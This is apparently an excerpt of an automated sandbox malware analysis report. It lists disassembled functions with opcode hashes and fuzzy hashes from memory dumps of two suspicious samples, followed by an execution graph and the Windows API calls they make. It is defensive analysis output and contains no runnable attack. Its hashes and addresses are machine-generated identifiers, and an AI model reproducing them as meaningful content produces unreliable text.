                                            Function 01701840 Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 251aecebc6311edd35d3461c4582ae7fbf650d1eee490ba82a1f3900b2e323bc
                                            • Instruction ID: b62463dcfe195481f0ae16d27ba6fe9e1757628560d7637165f098dc60ab6ffb
                                            • Opcode Fuzzy Hash: 251aecebc6311edd35d3461c4582ae7fbf650d1eee490ba82a1f3900b2e323bc
                                            • Instruction Fuzzy Hash: 07213B30B44345CFEB26DB28C6586ADB7F2AB89314FA005A8D506EB2D0DB35DE41CB91
                                            Function 01704F52 Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ee6ece1a3ce8e5cc1c2a7833c17004264ff5c7641539afd9fe9d4a1d061fae8b
                                            • Instruction ID: 5a226b346e44ee283fe1ea4794bb3a46d60527c45680e8c4bd09cdf3392af6e8
                                            • Opcode Fuzzy Hash: ee6ece1a3ce8e5cc1c2a7833c17004264ff5c7641539afd9fe9d4a1d061fae8b
                                            • Instruction Fuzzy Hash: F2212874700205CFDB25DF78D558A9EB7F1EB49300F5044A8E506EB3A1EB3A9D41CBA1
                                            Function 01701342 Relevance: .1, Instructions: 71COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8b5933a9827f44693344572a473988b5dabd45cc9116c3fa74128b18908acef4
                                            • Instruction ID: 7df3e3e9cdccc49745414fe5c6e4b969963cacf31e13b282a7b347c3a2e4c438
                                            • Opcode Fuzzy Hash: 8b5933a9827f44693344572a473988b5dabd45cc9116c3fa74128b18908acef4
                                            • Instruction Fuzzy Hash: CD219D70A41601CBEB376B6CE84472DF7A6EB46322F900839E406D77E1DA2DCC868742
                                            Function 017091E8 Relevance: .1, Instructions: 70COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b63205304bd72817a06291f8ec58493c50ef1aebea7d1a7155a59664a24786c4
                                            • Instruction ID: a153c6363fea1db3c00de8bd1d052f87f5ab6c2ec6b0203b83acd0feb40b6378
                                            • Opcode Fuzzy Hash: b63205304bd72817a06291f8ec58493c50ef1aebea7d1a7155a59664a24786c4
                                            • Instruction Fuzzy Hash: 91219231E0470ADBCB1ACFA5C45469EF7F2AF89314F10851AE919F7382DB709841CB51
                                            Function 01701850 Relevance: .1, Instructions: 70COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 45d3d295d8986ee54820df9f531701a4c0676057dc24427e1a37ab7f5eefa0f7
                                            • Instruction ID: 7ad1960b0d28d9b484a10472be41db03d1118014b59229ba367e83bf634166fc
                                            • Opcode Fuzzy Hash: 45d3d295d8986ee54820df9f531701a4c0676057dc24427e1a37ab7f5eefa0f7
                                            • Instruction Fuzzy Hash: 9921FC70B40305CFDB16DB68C6586AEB7F6AB49300F6004A8D506EB2E4DF35DE41CBA1
                                            Function 01701678 Relevance: .1, Instructions: 69COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a82d444f4838f396df971aaaaac9836fd0526c257a706225181d8ae80053b29f
                                            • Instruction ID: 9c6562942d87b848a4a577d4b0c883353a7fdb8533cbf23503734650eb7e16e9
                                            • Opcode Fuzzy Hash: a82d444f4838f396df971aaaaac9836fd0526c257a706225181d8ae80053b29f
                                            • Instruction Fuzzy Hash: 7F215E306402018FDB27EF68EC84B19B79AEB45315F505975D40ADB2B6DB3CDC868B91
                                            Function 01704F60 Relevance: .1, Instructions: 68COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7322b7f29a4967f87599857e29928532e473c091beb1d3392d9522905c330fde
                                            • Instruction ID: d4ff6e7dda93d2b85893cf5e1d833ca5ad5386750e8984d3ece2d04996c84ee9
                                            • Opcode Fuzzy Hash: 7322b7f29a4967f87599857e29928532e473c091beb1d3392d9522905c330fde
                                            • Instruction Fuzzy Hash: AA21F874700205CFDB25EF78D658A9EB7F1EB48300F5044A8E506EB3A5EB3A9D41CBA1
                                            Function 0141D006 Relevance: .1, Instructions: 62COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490057208.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_141d000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9acf243322edc24598b601ae466ebe9845e9a8b0c4d41acc72a812db11c3f84f
                                            • Instruction ID: 60f5de3a361db47b3047c738f9cd5b45ed907235d08723096f08b53c480470c9
                                            • Opcode Fuzzy Hash: 9acf243322edc24598b601ae466ebe9845e9a8b0c4d41acc72a812db11c3f84f
                                            • Instruction Fuzzy Hash: 0D2192B55093808FDB07CF24D594716BF71EB46214F28C5DBD8498F2A7C33A980ACB62
                                            Function 01700848 Relevance: .1, Instructions: 62COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a8089b22e96c402bf2cb17f43584756f107da3120a434d902f2aca5a2d91a56e
                                            • Instruction ID: 495420043841ac99e59ca2765bd8c17ed2e781bd32582b1480a705d7b019fa72
                                            • Opcode Fuzzy Hash: a8089b22e96c402bf2cb17f43584756f107da3120a434d902f2aca5a2d91a56e
                                            • Instruction Fuzzy Hash: B1116030B94304CFEF675A7DE404769B6D5FB852A4F10497AE406DB3E2DA29CE818BC1
                                            Function 01700838 Relevance: .1, Instructions: 62COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4ae368a5e866598c7ad11f44fc5104d780c67e9fa08d028872be73b9b98b88f9
                                            • Instruction ID: 1901b0ca7f3bbe1b98fd24ef7c531b7552dbf1adb633594a3acc74f2f3c6046e
                                            • Opcode Fuzzy Hash: 4ae368a5e866598c7ad11f44fc5104d780c67e9fa08d028872be73b9b98b88f9
                                            • Instruction Fuzzy Hash: 53119430A90304DFEF275A69A40076EB6D5FB812B4F10493AF406DB2D2D929CE818BC1
                                            Function 0170178A Relevance: .1, Instructions: 61COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b7657f44bbc06eb131720ae65ad18fb34573b126fb91c86e4f207094179d275f
                                            • Instruction ID: 69834005987a7af8030fe5f4a8a81175db65155ced9bbb3ed696b9419b3646de
                                            • Opcode Fuzzy Hash: b7657f44bbc06eb131720ae65ad18fb34573b126fb91c86e4f207094179d275f
                                            • Instruction Fuzzy Hash: 77118276F406119FCB12ABB89C4865E7BF6EB88760F104569DA09D3381EA38DD128BD1
                                            Function 01701452 Relevance: .1, Instructions: 57COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8968b8eab429e9d9d1202bd71e31f08c4ec1877d252f826bace04dd524cc74c6
                                            • Instruction ID: 2a5df96d214f95369b886373f64181243aeaa4c6dcefc373842754edb647b520
                                            • Opcode Fuzzy Hash: 8968b8eab429e9d9d1202bd71e31f08c4ec1877d252f826bace04dd524cc74c6
                                            • Instruction Fuzzy Hash: 13118E71A00315CBCF26EFB888446AEBBF4EF48264B5600B9E805E7381E735D941CBA5
                                            Function 01701460 Relevance: .1, Instructions: 53COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ea54f9316dc04024e186f310cebc32ecc893be82dd563941a9dd2c79390815a6
                                            • Instruction ID: 056bd7891207e67986ef9d0816b50fed90a0f0bf88c6b1a4b9fe8af706602bbc
                                            • Opcode Fuzzy Hash: ea54f9316dc04024e186f310cebc32ecc893be82dd563941a9dd2c79390815a6
                                            • Instruction Fuzzy Hash: 27016D31A00315CFCF22EFB884442ADBBE4AB48264B5504BAE805E7391E735D941CBA1
                                            Function 01709918 Relevance: .0, Instructions: 47COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bc22efd0a6a8f093814799fe37457b41251c3081a46b69a03f08ee257d48a3b9
                                            • Instruction ID: 035814654a4e83e5c0f7b84b3a84aa471637d61e54b56a5d57cca899fc08bc41
                                            • Opcode Fuzzy Hash: bc22efd0a6a8f093814799fe37457b41251c3081a46b69a03f08ee257d48a3b9
                                            • Instruction Fuzzy Hash: 65019630A102058FDB05DF99D98478ABBA5FF94310F548574C94C5B29AD770D945C7D1
                                            Function 017014EC Relevance: .0, Instructions: 36COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5823edd75959a021a4477b49f1f6912d829eff0da0e16b61dcf8603b99c5873b
                                            • Instruction ID: b85881c25b7b7cfecee745a6e6fb25677707ea5fca011b0b233d353a033868be
                                            • Opcode Fuzzy Hash: 5823edd75959a021a4477b49f1f6912d829eff0da0e16b61dcf8603b99c5873b
                                            • Instruction Fuzzy Hash: 72F0F636A04350CBDB238BA884901ACFBE0EE6936579A40DBE805DB2A1D325E902D751
                                            Function 01708179 Relevance: .0, Instructions: 35COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: dc3dd359ecc62891e7d9759a6e1c2822fa9eb2c939816c71822e00cc538d25d2
                                            • Instruction ID: 685e1d671aacbf3b1d719f08ddb647a77fa72b660b8ea34205fdb8c29b32dc99
                                            • Opcode Fuzzy Hash: dc3dd359ecc62891e7d9759a6e1c2822fa9eb2c939816c71822e00cc538d25d2
                                            • Instruction Fuzzy Hash: 07018F705101468FCB0AEF78F985A5D3B75EF41209F1046BDC4059B2A6DE39AE4AC781
                                            Function 01708188 Relevance: .0, Instructions: 33COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b6cbeffe962512a0eea9f4812ad765538ee104688fd6f5bb069c92b62e7ea3a2
                                            • Instruction ID: c23d7429ba8bb500da8b47b403c804b17e1296d43fa01309f416a9690c019c6d
                                            • Opcode Fuzzy Hash: b6cbeffe962512a0eea9f4812ad765538ee104688fd6f5bb069c92b62e7ea3a2
                                            • Instruction Fuzzy Hash: 61F03170910109DFCB0AEFB4F94499D7BB9EF40304F5045B9C404AB264DF38AE89CB91

                                            Execution Graph

                                            Execution Coverage:8.7%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:162
                                            Total number of Limit Nodes:8
                                            execution_graph 40072 acd01c 40073 acd034 40072->40073 40074 acd08e 40073->40074 40077 4ba2c08 40073->40077 40086 4ba0ad4 40073->40086 40079 4ba2c18 40077->40079 40078 4ba2c79 40111 4ba0bfc 40078->40111 40079->40078 40081 4ba2c69 40079->40081 40095 4ba2e6c 40081->40095 40101 4ba2d90 40081->40101 40106 4ba2da0 40081->40106 40082 4ba2c77 40087 4ba0adf 40086->40087 40088 4ba2c79 40087->40088 40090 4ba2c69 40087->40090 40089 4ba0bfc CallWindowProcW 40088->40089 40091 4ba2c77 40089->40091 40092 4ba2e6c CallWindowProcW 40090->40092 40093 4ba2da0 CallWindowProcW 40090->40093 40094 4ba2d90 CallWindowProcW 40090->40094 40092->40091 40093->40091 40094->40091 40096 4ba2e2a 40095->40096 40097 4ba2e7a 40095->40097 40115 4ba2e58 40096->40115 40118 4ba2e49 40096->40118 40098 4ba2e40 40098->40082 40103 4ba2da0 40101->40103 40102 4ba2e40 40102->40082 40104 4ba2e58 CallWindowProcW 40103->40104 40105 4ba2e49 CallWindowProcW 40103->40105 40104->40102 40105->40102 40108 4ba2db4 40106->40108 40107 4ba2e40 40107->40082 40109 4ba2e58 CallWindowProcW 40108->40109 40110 4ba2e49 CallWindowProcW 40108->40110 40109->40107 40110->40107 40112 4ba0c07 40111->40112 40113 4ba435a CallWindowProcW 40112->40113 40114 4ba4309 40112->40114 40113->40114 40114->40082 40116 4ba2e69 40115->40116 40122 4ba4292 40115->40122 40116->40098 40119 4ba2e58 40118->40119 40120 4ba2e69 40119->40120 40121 4ba4292 CallWindowProcW 40119->40121 40120->40098 40121->40120 40123 4ba0bfc CallWindowProcW 40122->40123 40124 4ba42aa 40123->40124 40124->40116 40050 4ba97d9 40051 4ba97ef 40050->40051 40053 b26034 2 API calls 40051->40053 40054 b2874a 2 API calls 40051->40054 40052 4baa3fe 40053->40052 40054->40052 40055 4d451b0 40056 4d451d3 40055->40056 40060 4d46370 40056->40060 40064 4d46362 40056->40064 40057 4d4528d 40061 4d463b8 40060->40061 40063 4d463c1 40061->40063 40068 4d45f20 40061->40068 40063->40057 40065 4d463b8 40064->40065 40066 4d463c1 40065->40066 40067 4d45f20 LoadLibraryW 40065->40067 40066->40057 40067->40066 40069 4d464b8 LoadLibraryW 40068->40069 40071 4d4652d 40069->40071 40071->40063 40125 4ba978c 40126 4ba9796 40125->40126 40136 4ba9308 40126->40136 40129 4ba9308 LoadLibraryExW GetModuleHandleW 40130 4ba971f 40129->40130 40130->40129 40131 4ba92f8 40130->40131 40132 4ba9303 40131->40132 40134 b26034 2 API calls 40132->40134 40135 b2874a 2 API calls 40132->40135 40133 4baa3fe 40133->40130 40134->40133 40135->40133 40137 4ba9313 40136->40137 40140 4ba9438 40137->40140 40139 4baa83f 40139->40130 40141 4ba9443 40140->40141 40143 b26034 2 API calls 40141->40143 40144 b2874a 2 API calls 40141->40144 40142 4baa8c4 40142->40139 40143->40142 40144->40142 39941 b2d478 39942 b2d4be 39941->39942 39946 b2d658 39942->39946 39949 b2d648 39942->39949 39943 b2d5ab 39953 b2cd50 39946->39953 39950 b2d658 39949->39950 39951 b2cd50 DuplicateHandle 39950->39951 39952 b2d686 39951->39952 39952->39943 39954 b2d6c0 DuplicateHandle 39953->39954 39955 b2d686 39954->39955 39955->39943 39956 4ba9ce7 39957 4ba9ced 39956->39957 39961 b26034 39957->39961 39968 b2874a 39957->39968 39958 4baa3fe 39962 b2603f 39961->39962 39964 b28a0b 39962->39964 39975 b2b0c0 39962->39975 39963 b28a49 39963->39958 39964->39963 39979 b2d1a1 39964->39979 39988 b2d1b0 39964->39988 39969 b28783 39968->39969 39971 b28a0b 39969->39971 39972 b2b0c0 2 API calls 39969->39972 39970 b28a49 39970->39958 39971->39970 39973 b2d1b0 2 API calls 39971->39973 39974 b2d1a1 2 API calls 39971->39974 39972->39971 39973->39970 39974->39970 39997 b2b0f8 39975->39997 40000 b2b0e9 39975->40000 39976 b2b0d6 39976->39964 39981 b2d1b0 39979->39981 39980 b2d1f5 39980->39963 39981->39980 39984 b2d295 39981->39984 40024 b2d360 39981->40024 40028 b2d350 39981->40028 40032 b2d3df 39981->40032 39982 b2d32a 39982->39963 39983 b2d3df 2 API calls 39983->39984 39984->39982 39984->39983 39990 b2d1d1 39988->39990 39989 b2d1f5 39989->39963 39990->39989 39993 b2d295 39990->39993 39994 b2d360 2 API calls 39990->39994 39995 b2d350 2 API calls 39990->39995 39996 b2d3df 2 API calls 39990->39996 39991 b2d32a 39991->39963 39992 b2d3df 2 API calls 39992->39993 39993->39991 39993->39992 39994->39993 39995->39993 39996->39993 40004 b2b1f0 39997->40004 39998 b2b107 39998->39976 40001 b2b0f8 40000->40001 40003 b2b1f0 2 API calls 40001->40003 40002 b2b107 40002->39976 40003->40002 40005 b2b201 40004->40005 40006 b2b224 40004->40006 40005->40006 40012 b2b488 40005->40012 40016 b2b478 40005->40016 40006->39998 40007 b2b21c 40007->40006 40008 b2b428 GetModuleHandleW 40007->40008 40009 b2b455 40008->40009 40009->39998 40014 b2b49c 40012->40014 40013 b2b4c1 40013->40007 40014->40013 40020 b2ac28 40014->40020 40017 b2b49c 40016->40017 40018 b2b4c1 40017->40018 40019 b2ac28 LoadLibraryExW 40017->40019 40018->40007 40019->40018 40021 b2b668 LoadLibraryExW 40020->40021 40023 b2b6e1 40021->40023 40023->40013 40025 b2d36d 40024->40025 40026 b2d3a7 40025->40026 40037 b2cc88 40025->40037 40026->39984 40029 b2d360 40028->40029 40030 b2cc88 2 API calls 40029->40030 40031 b2d3a7 40029->40031 40030->40031 40031->39984 40033 b2d3ed 40032->40033 40034 b2d378 40032->40034 40033->39984 40035 b2d3a7 40034->40035 40036 b2cc88 2 API calls 40034->40036 40035->39984 40036->40035 40038 b2cc8d 40037->40038 40040 b2dcb8 40038->40040 40041 b2cdb4 40038->40041 40040->40040 40042 b2cdbf 40041->40042 40043 b26034 2 API calls 40042->40043 40044 b2dd27 40043->40044 40044->40040

                                            Executed Functions

                                            Function 00B2B1F0 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2460 b2b1f0-b2b1ff 2461 b2b201-b2b20e call b2abc4 2460->2461 2462 b2b22b-b2b22f 2460->2462 2469 b2b210 2461->2469 2470 b2b224 2461->2470 2463 b2b243-b2b284 2462->2463 2464 b2b231-b2b23b 2462->2464 2471 b2b291-b2b29f 2463->2471 2472 b2b286-b2b28e 2463->2472 2464->2463 2516 b2b216 call b2b488 2469->2516 2517 b2b216 call b2b478 2469->2517 2470->2462 2473 b2b2c3-b2b2c5 2471->2473 2474 b2b2a1-b2b2a6 2471->2474 2472->2471 2476 b2b2c8-b2b2cf 2473->2476 2477 b2b2b1 2474->2477 2478 b2b2a8-b2b2af call b2abd0 2474->2478 2475 b2b21c-b2b21e 2475->2470 2479 b2b360-b2b420 2475->2479 2480 b2b2d1-b2b2d9 2476->2480 2481 b2b2dc-b2b2e3 2476->2481 2483 b2b2b3-b2b2c1 2477->2483 2478->2483 2511 b2b422-b2b425 2479->2511 2512 b2b428-b2b453 GetModuleHandleW 2479->2512 2480->2481 2484 b2b2f0-b2b2f9 call b2abe0 2481->2484 2485 b2b2e5-b2b2ed 2481->2485 2483->2476 2491 b2b306-b2b30b 2484->2491 2492 b2b2fb-b2b303 2484->2492 2485->2484 2493 b2b329-b2b32d 2491->2493 2494 b2b30d-b2b314 2491->2494 2492->2491 2518 b2b330 call b2b788 2493->2518 2519 b2b330 call b2b779 2493->2519 2494->2493 2496 b2b316-b2b326 call b2abf0 call b2ac00 2494->2496 2496->2493 2497 b2b333-b2b336 2500 b2b338-b2b356 2497->2500 2501 b2b359-b2b35f 2497->2501 2500->2501 2511->2512 2513 b2b455-b2b45b 2512->2513 2514 b2b45c-b2b470 2512->2514 2513->2514 2516->2475 2517->2475 2518->2497 2519->2497
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 00B2B446
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2097387726.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_b20000_xyodEPhulIrkY.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: 18dd76d320b812462c3a4b4560373e109a1b90229dff49c42f389941f42d5487
                                            • Instruction ID: 1b3994760968b33aba2f49ebe55c21f0d473a031dfe247508c45928976397f61
                                            • Opcode Fuzzy Hash: 18dd76d320b812462c3a4b4560373e109a1b90229dff49c42f389941f42d5487
                                            • Instruction Fuzzy Hash: 9B714470A00B158FDB24DF6AE144B6ABBF5FF88300F008A6DD48AD7A50DB75E945CB91
                                            Function 00B25CC4 Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2520 b25cc4-b25cce 2521 b25cd0-b25d91 CreateActCtxA 2520->2521 2523 b25d93-b25d99 2521->2523 2524 b25d9a-b25df4 2521->2524 2523->2524 2531 b25e03-b25e07 2524->2531 2532 b25df6-b25df9 2524->2532 2533 b25e18 2531->2533 2534 b25e09-b25e15 2531->2534 2532->2531 2536 b25e19 2533->2536 2534->2533 2536->2536
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 00B25D81
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2097387726.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_b20000_xyodEPhulIrkY.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: ea6ef4ec1a2616e4383fe8bde5739427f26e063a367ab1411efe9302dc3e4710
                                            • Instruction ID: 9e8782bd1ffa1338cb3d9b460f50d8daf137d83f01531965c57bcbf69f534219
                                            • Opcode Fuzzy Hash: ea6ef4ec1a2616e4383fe8bde5739427f26e063a367ab1411efe9302dc3e4710
                                            • Instruction Fuzzy Hash: 5941F2B1C00629CFDB24DFA9C944BDDBBF5BF48304F20806AD418AB261DB75694ACF91
                                            Function 04BA0BFC Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                            Download Yara Rule
                                            APIs
                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 04BA4381
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2103385263.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_4ba0000_xyodEPhulIrkY.jbxd
                                            Similarity
                                            • API ID: CallProcWindow
                                            • String ID:
                                            • API String ID: 2714655100-0
                                            • Opcode ID: 37728b7a2ce05b0a0abda12ca3e2970752683e8d72b7ee79483308d1d667af0c
                                            • Instruction ID: 6c35de3f98323d0f181b5eb50c71817fadcaf2c83a9f8d7724f6dd94d600fd44
                                            • Opcode Fuzzy Hash: 37728b7a2ce05b0a0abda12ca3e2970752683e8d72b7ee79483308d1d667af0c
                                            • Instruction Fuzzy Hash: 2F4127B5A042099FDB14CF99C488AAEFBF5FF88314F24C499D519A7321D375A841CBA0
                                            Function 00B247C4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 00B25D81
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2097387726.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_b20000_xyodEPhulIrkY.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: 964db3454d1f8899139f3a635d47be9ee35bfbb3a11a4670c030007ed4d0c760
                                            • Instruction ID: cfec3dc2b1c2351a4962d718e2a2d5e891e89039ed79f60d7d1fdddb188835c1
                                            • Opcode Fuzzy Hash: 964db3454d1f8899139f3a635d47be9ee35bfbb3a11a4670c030007ed4d0c760
                                            • Instruction Fuzzy Hash: 9541D2B1C00629CBDB24DFA9C944B9DBBF5FF48304F2080AAD418AB255DB75694ACF91
                                            Function 00B2D6B8 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                            Download Yara Rule
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00B2D686,?,?,?,?,?), ref: 00B2D747
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2097387726.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_b20000_xyodEPhulIrkY.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 02ea8d291a609db55e566e226b137a5dd6d07988aa834036b727802f1446022d
                                            • Instruction ID: c3c7c709c2c8499fd79dd394a3a6c1cf7266d239018bd987d50459d0f446a4f4
                                            • Opcode Fuzzy Hash: 02ea8d291a609db55e566e226b137a5dd6d07988aa834036b727802f1446022d
                                            • Instruction Fuzzy Hash: 7421E4B59002189FDB10CF9AD584AEEBFF8FB48314F24841AE919A3310C378A940CFA1
                                            Function 00B2CD50 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                            Download Yara Rule
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00B2D686,?,?,?,?,?), ref: 00B2D747
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2097387726.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_b20000_xyodEPhulIrkY.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: cb7aca4e0ddf707326432c7fd24ab7282cb68b5c1152aab3d27cb4035190f54d
                                            • Instruction ID: ce40a36471e1ccc0ea764cdad5e95fc77999aec77585e00b28c4d415056c39a0
